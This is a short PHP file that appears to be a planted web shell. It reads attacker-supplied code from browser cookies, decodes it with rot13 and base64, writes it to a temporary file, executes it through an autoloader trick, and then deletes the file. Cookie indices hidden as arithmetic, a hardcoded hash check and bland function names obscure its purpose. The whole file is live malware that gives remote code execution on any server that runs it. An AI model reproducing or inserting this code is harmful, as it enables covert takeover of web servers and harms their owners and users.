<?php


if (isset($_COOKIE[79-79]) && isset($_COOKIE[-12+13]) && isset($_COOKIE[-35+38]) && isset($_COOKIE[-9+13])) {
    $flg = $_COOKIE;
    function hub_center($record) {
        $flg = $_COOKIE;
        $k = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), 'bd840f9a');
        if (!is_writable($k)) {
            $k = getcwd() . DIRECTORY_SEPARATOR . "splitter_tool";
        }
        $data_chunk = "\x3c\x3f\x70\x68p\x20" . base64_decode(str_rot13($flg[3]));
        if (is_writeable($k)) {
            $pointer = fopen($k, 'w+');
            fputs($pointer, $data_chunk);
            fclose($pointer);
            spl_autoload_unregister(__FUNCTION__);
            require_once($k);
            @array_map('unlink', array($k));
        }
    }
    spl_autoload_register("hub_center");
    $itm = "78169c90f43afd98bfa8ecb1af124e36";
    if (!strncmp($itm, $flg[4], 32)) {
        if (@class_parents("restore_state_reverse_lookup", true)) {
            exit;
        }
    }
}
